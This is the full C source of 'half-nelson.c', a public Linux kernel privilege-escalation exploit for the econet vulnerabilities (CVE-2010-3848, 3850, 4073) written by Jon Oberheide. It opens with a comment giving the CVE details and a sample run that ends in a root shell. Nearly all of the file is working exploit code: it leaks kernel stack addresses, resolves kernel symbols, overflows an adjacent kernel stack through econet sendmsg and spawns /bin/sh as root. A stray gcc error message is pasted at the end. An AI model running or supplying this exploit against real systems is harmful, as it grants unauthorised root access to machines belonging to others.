/*
 * half-nelson.c
 *
 * Linux Kernel < 2.6.36.2 Econet Privilege Escalation Exploit
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 *
 * Information:
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3848
 *
 *   Stack-based buffer overflow in the econet_sendmsg function in
 *   net/econet/af_econet.c in the Linux kernel before 2.6.36.2, when an
 *   econet address is configured, allows local users to gain privileges by
 *   providing a large number of iovec structures.
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3850
 *
 *   The ec_dev_ioctl function in net/econet/af_econet.c in the Linux kernel
 *   before 2.6.36.2 does not require the CAP_NET_ADMIN capability, which
 *   allows local users to bypass intended access restrictions and configure
 *   econet addresses via an SIOCSIFADDR ioctl call.
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4073
 *
 *   The ipc subsystem in the Linux kernel before 2.6.37-rc1 does not
 *   initialize certain structures, which allows local users to obtain
 *   potentially sensitive information from kernel stack memory.
 *
 * Usage:
 *
 *   $ gcc half-nelson.c -o half-nelson -lrt
 *   $ ./half-nelson
 *   [+] looking for symbols...
 *   [+] resolved symbol commit_creds to 0xffffffff81088ad0
 *   [+] resolved symbol prepare_kernel_cred to 0xffffffff81088eb0
 *   [+] resolved symbol ia32_sysret to 0xffffffff81046692
 *   [+] spawning children to achieve adjacent kstacks...
 *   [+] found parent kstack at 0xffff88001c6ca000
 *   [+] found adjacent children kstacks at 0xffff88000d10a000 and 0xffff88000d10c000
 *   [+] lower child spawning a helper...
 *   [+] lower child calling compat_sys_wait4 on helper...
 *   [+] helper going to sleep...
 *   [+] upper child triggering stack overflow...
 *   [+] helper woke up
 *   [+] lower child returned from compat_sys_wait4
 *   [+] parent's restart_block has been clobbered
 *   [+] escalating privileges...
 *   [+] launching root shell!
 *   # id
 *   uid=0(root) gid=0(root)
 *
 * Notes:
 *
 *   This exploit leverages three vulnerabilities to escalate privileges.
 *   The primary vulnerability is a kernel stack overflow, not a stack buffer
 *   overflow as the CVE description incorrectly states. I believe this is the
 *   first public exploit for a kernel stack overflow, and it turns out to be
 *   a bit tricky due to some particulars of the econet vulnerability. A full
 *   breakdown of the exploit is forthcoming.
 *
 *   Tested on Ubuntu 10.04 LTS (2.6.32-21-generic).
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <syscall.h>
#include <inttypes.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/ipc.h>
#include <sys/sem.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/syscall.h>
#include <netinet/in.h>
#include <net/if.h>
 
#define IOVS           446
#define NPROC          1024
#define KSTACK_SIZE    8192
 
#define KSTACK_UNINIT  0
#define KSTACK_UPPER   1
#define KSTACK_LOWER   2
#define KSTACK_DIE     3
#define KSTACK_PARENT  4
#define KSTACK_CLOBBER 5
 
#define LEAK_BASE      0xffff880000000000
#define LEAK_TOP       0xffff8800c0000000
#define LEAK_DEPTH     500
#define LEAK_OFFSET    32
 
#define NR_IPC         0x75
#define NR_WAIT4       0x72
#define SEMCTL         0x3
 
#ifndef PF_ECONET
#define PF_ECONET      19
#endif
 
#define STACK_OFFSET   6
#define RESTART_OFFSET 40
 
struct ec_addr {
    unsigned char station;
    unsigned char net;
};
 
struct sockaddr_ec {
    unsigned short sec_family;
    unsigned char port;
    unsigned char cb;
    unsigned char type;
    struct ec_addr addr;
    unsigned long cookie;
};
 
struct ipc64_perm {
    uint32_t key;
    uint32_t uid;
    uint32_t gid;
    uint32_t cuid;
    uint32_t cgid;
    uint32_t mode;
    uint16_t seq;
    uint16_t __pad2;
    unsigned long __unused1;
    unsigned long __unused2;
};
 
struct semid64_ds {
    struct ipc64_perm sem_perm;
    unsigned long sem_otime;
    unsigned long __unused1;
    unsigned long sem_ctime;
    unsigned long __unused;
    unsigned long sem_nsems;
    unsigned long __unused3;
    unsigned long __unused4;
};
 
union semun {
    int val;
    struct semid_ds *buf;
    unsigned short *array;
    struct seminfo *__buf;
};
 
struct region {
    unsigned long parent;
    unsigned long addrs[NPROC];
};
struct region *region;
 
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long ia32_sysret;
  
void __attribute__((regparm(3)))
kernel_code(void)
{
    commit_creds(prepare_kernel_cred(0));
}
 
void
payload_parent(void)
{
    asm volatile (
        "mov $kernel_code, %rax\n"
        "call *%rax\n"
    );
}
 
void
payload_child(void)
{
    asm volatile (
        "movq $payload_parent, (%0)\n"
        "jmpq *%1\n"
        :
        : "r"(region->parent + RESTART_OFFSET), "r"(ia32_sysret)
    );
}
 
unsigned long
get_kstack(void)
{
    int i, size, offset;
    union semun *arg;
    struct semid_ds dummy;
    struct semid64_ds *leaked;
    char *stack_start, *stack_end;
    unsigned char *p;
    unsigned long kstack, *ptr;
 
    /* make sure our argument is 32-bit accessible */
    arg = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0);
    if (arg == MAP_FAILED) {
        printf("[-] failure mapping memory, aborting!\n");
        exit(1);
    }
 
    /* map a fake stack to use during syscall */
    stack_start = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0);
    if (stack_start == MAP_FAILED) {
        printf("[-] failure mapping memory, aborting!\n");
        exit(1);
    }
    stack_end = stack_start + 4096;
 
    memset(arg, 0, sizeof(union semun));
    memset(&dummy, 0, sizeof(struct semid_ds));
    arg->buf = &dummy;
 
    /* syscall(NR_IPC, SEMCTL, 0, 0, IPC_SET, arg) */
    asm volatile (
        "push %%rax\n"
        "push %%rbx\n"
        "push %%rcx\n"
        "push %%rdx\n"
        "push %%rsi\n"
        "push %%rdi\n"
        "movl %0, %%eax\n"
        "movl %1, %%ebx\n"
        "movl %2, %%ecx\n"
        "movl %3, %%edx\n"
        "movl %4, %%esi\n"
        "movq %5, %%rdi\n"
        "movq %%rsp, %%r8\n"
        "movq %6, %%rsp\n"
        "push %%r8\n"
        "int $0x80\n"
        "pop %%r8\n"
        "movq %%r8, %%rsp\n"
        "pop %%rdi\n"
        "pop %%rsi\n"
        "pop %%rdx\n"
        "pop %%rcx\n"
        "pop %%rbx\n"
        "pop %%rax\n"
        :
        : "r"(NR_IPC), "r"(SEMCTL), "r"(0), "r"(0), "r"(IPC_SET), "r"(arg), "r"(stack_end)
        : "memory", "rax", "rbx", "rcx", "rdx", "rsi", "rdi", "r8"
    );
 
    /* naively extract a pointer to the kstack from the kstack */
    p = stack_end - (sizeof(unsigned long) + sizeof(struct semid64_ds)) + LEAK_OFFSET;
    kstack = *(unsigned long *) p;
 
    if (kstack < LEAK_BASE || kstack > LEAK_TOP) {
        printf("[-] failed to leak a suitable kstack address, try again!\n");
        exit(1);
    }
    if ((kstack % 0x1000) < (0x1000 - LEAK_DEPTH)) {
        printf("[-] failed to leak a suitable kstack address, try again!\n");
        exit(1);
    }
 
    kstack = kstack & ~0x1fff;
     
    return kstack;
}
 
unsigned long
get_symbol(char *name)
{
    FILE *f;
    unsigned long addr;
    char dummy, sym[512];
    int ret = 0;
  
    f = fopen("/proc/kallsyms", "r");
    if (!f) {
        return 0;
    }
  
    while (ret != EOF) {
        ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);
        if (ret == 0) {
            fscanf(f, "%s\n", sym);
            continue;
        }
        if (!strcmp(name, sym)) {
            printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
            fclose(f);
            return addr;
        }
    }
    fclose(f);
  
    return 0;
}
 
int
get_adjacent_kstacks(void)
{
    int i, ret, shm, pid, type;
 
    /* create shared communication channel between parent and its children */
    shm = shm_open("/halfnelson", O_RDWR | O_CREAT, S_IRWXU | S_IRWXG | S_IRWXO);
    if (shm < 0) {
        printf("[-] failed creating shared memory, aborting!\n");
        exit(1);
    }
 
    ret = ftruncate(shm, sizeof(struct region));
    if (ret != 0) {
        printf("[-] failed resizing shared memory, aborting!\n");
        exit(1);
    }
 
    region = mmap(NULL, sizeof(struct region), PROT_READ | PROT_WRITE, MAP_SHARED, shm, 0);
    memset(region, KSTACK_UNINIT, sizeof(struct region));
 
    /* parent kstack self-discovery */
    region->parent = get_kstack();
 
    printf("[+] found parent kstack at 0x%lx\n", region->parent);
 
    /* fork and discover children with adjacently-allocated kernel stacks */
    for (i = 0; i < NPROC; ++i) {
        pid = fork();
 
        if (pid > 0) {
            type = KSTACK_PARENT;
            continue;
        } else if (pid == 0) {
            /* children do kstack self-discovery */
            region->addrs[i] = get_kstack();
 
            /* children sleep until parent has found adjacent children */
            while (1) {
                sleep(1);
                if (region->addrs[i] == KSTACK_DIE) {
                    /* parent doesn't need us :-( */
                    exit(0);
                } else if (region->addrs[i] == KSTACK_UPPER) {
                    /* we're the upper adjacent process */
                    type = KSTACK_UPPER;
                    break;
                } else if (region->addrs[i] == KSTACK_LOWER) {
                    /* we're the lower adjacent process */
                    type = KSTACK_LOWER;
                    break;
                }
            }
            break;
        } else {
            printf("[-] fork failed, aborting!\n");
            exit(1);
        }
    }
 
    return type;
}
 
void
do_parent(void)
{
    int i, j, upper, lower;
 
    /* parent sleeps until we've discovered all the child kstacks */
    while (1) {
        sleep(1);
        for (i = 0; i < NPROC; ++i) {
            if (region->addrs[i] == KSTACK_UNINIT) {
                break;
            }
        }
        if (i == NPROC) {
            break;
        }
    }
 
    /* figure out if we have any adjacent child kstacks */
    for (i = 0; i < NPROC; ++i) {
        for (j = 0; j < NPROC; ++j) {
            if (region->addrs[i] == region->addrs[j] + KSTACK_SIZE) {
                break;
            }
        }
        if (j != NPROC) {
            break;
        }
    }
    if (i == NPROC && j == NPROC) {
        printf("[-] failed to find adjacent kstacks, try again!\n");
        exit(1);
    }
 
    upper = i;
    lower = j;
 
    printf("[+] found adjacent children kstacks at 0x%lx and 0x%lx\n", region->addrs[lower], region->addrs[upper]);
 
    /* signal to non-adjacent children to die */
    for (i = 0; i < NPROC; ++i) {
        if (i != upper && i != lower) {
            region->addrs[i] = KSTACK_DIE;
        }
    }
 
    /* signal adjacent children to continue on */
    region->addrs[upper] = KSTACK_UPPER;
    region->addrs[lower] = KSTACK_LOWER;
 
    /* parent sleeps until child has clobbered the fptr */
    while (1) {
        sleep(1);
        if (region->parent == KSTACK_CLOBBER) {
            break;
        }
    }
 
    printf("[+] escalating privileges...\n");
 
    /* trigger our clobbered fptr */
    syscall(__NR_restart_syscall);
 
    /* our privileges should be escalated now */
    if (getuid() != 0) {
        printf("[-] privilege escalation failed, aborting!\n");
        exit(1);
    }
 
    printf("[+] launching root shell!\n");
 
    execl("/bin/sh", "/bin/sh", NULL);
}
 
void
do_child_upper(void)
{
    int i, ret, eco_sock;
    struct sockaddr_ec eco_addr;
    struct msghdr eco_msg;
    struct iovec iovs[IOVS];
    struct ifreq ifr;
    char *target;
 
    /* calculate payload target, skip prologue */
    target = (char *) payload_child;
    target += 4;
     
    /* give lower child a chance to enter its wait4 call */
    sleep(1);
 
    /* write some zeros */
    for (i = 0; i < STACK_OFFSET; ++i) {
        iovs[i].iov_base = (void *) 0x0;
        iovs[i].iov_len = 0;
    }
 
    /* overwrite saved ia32_sysret address on stack */
    iovs[STACK_OFFSET].iov_base = (void *) target;
    iovs[STACK_OFFSET].iov_len = 0x0246;
 
    /* force abort via EFAULT */
    for (i = STACK_OFFSET + 1; i < IOVS; ++i) {
        iovs[i].iov_base = (void *) 0xffffffff00000000;
        iovs[i].iov_len = 0;
    }
 
    /* create econet socket */
    eco_sock = socket(PF_ECONET, SOCK_DGRAM, 0);
    if (eco_sock < 0) {
        printf("[-] failed creating econet socket, aborting!\n");
        exit(1);
    }
 
    memset(&ifr, 0, sizeof(ifr));
    strcpy(ifr.ifr_name, "lo");
 
    /* trick econet into associated with the loopback */
    ret = ioctl(eco_sock, SIOCSIFADDR, &ifr);
    if (ret != 0) {
        printf("[-] failed setting interface address, aborting!\n");
        exit(1);
    }
 
    memset(&eco_addr, 0, sizeof(eco_addr));
    memset(&eco_msg, 0, sizeof(eco_msg));
    eco_msg.msg_name = &eco_addr;
    eco_msg.msg_namelen = sizeof(eco_addr);
    eco_msg.msg_flags = 0;
    eco_msg.msg_iov = &iovs[0];
    eco_msg.msg_iovlen = IOVS;
 
    printf("[+] upper child triggering stack overflow...\n");
 
    /* trigger the kstack overflow into lower child's kstack */
    ret = sendmsg(eco_sock, &eco_msg, 0);
    if (ret != -1 || errno != EFAULT) {
        printf("[-] sendmsg succeeded unexpectedly, aborting!\n");
        exit(1);
    }
 
    close(eco_sock);
}
 
void
do_child_lower(void)
{
    int pid;
 
    printf("[+] lower child spawning a helper...\n");
 
    /* fork off a helper to wait4 on */
    pid = fork();
    if (pid == 0) {
        printf("[+] helper going to sleep...\n");
        sleep(5);
        printf("[+] helper woke up\n");
        exit(1);
    }
 
    printf("[+] lower child calling compat_sys_wait4 on helper...\n");
 
    /* syscall(NR_WAIT4, pid, 0, 0, 0) */
    asm volatile (
        "push %%rax\n"
        "push %%rbx\n"
        "push %%rcx\n"
        "push %%rdx\n"
        "push %%rsi\n"
        "movl %0, %%eax\n"
        "movl %1, %%ebx\n"
        "movl %2, %%ecx\n"
        "movl %3, %%edx\n"
        "movl %4, %%esi\n"
        "int $0x80\n"
        "pop %%rsi\n"
        "pop %%rdx\n"
        "pop %%rcx\n"
        "pop %%rbx\n"
        "pop %%rax\n"
        :
        : "r"(NR_WAIT4), "r"(pid), "r"(0), "r"(0), "r"(0)
        : "memory", "rax", "rbx", "rcx", "rdx", "rsi"
    );
 
    printf("[+] lower child returned from compat_sys_wait4\n");
 
    printf("[+] parent's restart_block has been clobbered\n");
 
    /* signal parent that our fptr should now be clobbered */
    region->parent = KSTACK_CLOBBER;
}
 
int
main(int argc, char **argv)
{
    int type;
 
    if (sizeof(unsigned long) != 8) {
        printf("[-] x86_64 only, sorry!\n");
        exit(1);
    }
 
    printf("[+] looking for symbols...\n");
  
    commit_creds = (_commit_creds) get_symbol("commit_creds");
    if (!commit_creds) {
        printf("[-] symbol table not available, aborting!\n");
        exit(1);
    }
  
    prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
    if (!prepare_kernel_cred) {
        printf("[-] symbol table not available, aborting!\n");
        exit(1);
    }
 
    ia32_sysret = get_symbol("ia32_sysret");
    if (!ia32_sysret) {
        printf("[-] symbol table not available, aborting!\n");
        exit(1);
    }
 
    printf("[+] spawning children to achieve adjacent kstacks...\n");
 
    type = get_adjacent_kstacks();
 
    if (type == KSTACK_PARENT) {
        do_parent();
    } else if (type == KSTACK_UPPER) {
        do_child_upper();
    } else if (type == KSTACK_LOWER) {
        do_child_lower();
    }
 
    return 0;
}

In file included from /usr/include/features.h:378,
                 from /usr/include/stdio.h:28,
                 from half-nelson.c:65:
/usr/include/gnu/stubs.h:9:27: error: gnu/stubs-64.h: No existe el fichero o el directorio